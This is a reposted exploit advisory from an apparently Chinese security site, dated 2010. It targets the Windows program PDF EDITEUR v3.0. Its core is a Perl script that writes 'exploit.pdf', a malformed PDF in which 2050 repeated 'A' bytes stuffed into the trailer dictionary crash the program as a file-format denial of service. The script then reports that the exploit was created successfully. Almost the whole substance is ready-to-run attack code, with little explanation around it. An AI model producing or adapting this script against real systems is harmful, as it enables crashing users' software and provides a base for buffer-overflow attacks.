PDF EDITEUR v3.0 - File Format Denial Of Service
|
来源:vfocus.net 作者:antrhacks 发布时间:2010-08-11
|
|
# Title: PDF EDITEUR v3.0 - File Format Denial Of Service # Author: antrhacks # Software Link: http://www.01net.com/telecharger/windows/Bureautique/editeur_de_texte/fiches/27027.html # Version: 3.00 # Platform: Windows XP SP3 Home edition Fr
#!/usr/bin/perl my $file= "exploit.pdf"; my $junk= "%PDF-1.4%вгПУ 203 0 obj <</Linearized 1/L 53867/O 206/E 36259/N 2/T 49759/H [ 892 262]>> endobj xref 203 29 trailer <<" . "\x41" x 2050 . " 232/Prev 49747/XRefStm 1154/Root 204 0 R/Info 15 0 R/ID[<7DCD31CD45165DE26A7561A13AE64066><1AF7BC0CE6ED774EAA15CA98263EE96B>]>> startxref 0 %%EOF "; open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("[+] Your Exploit was created successfully");
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|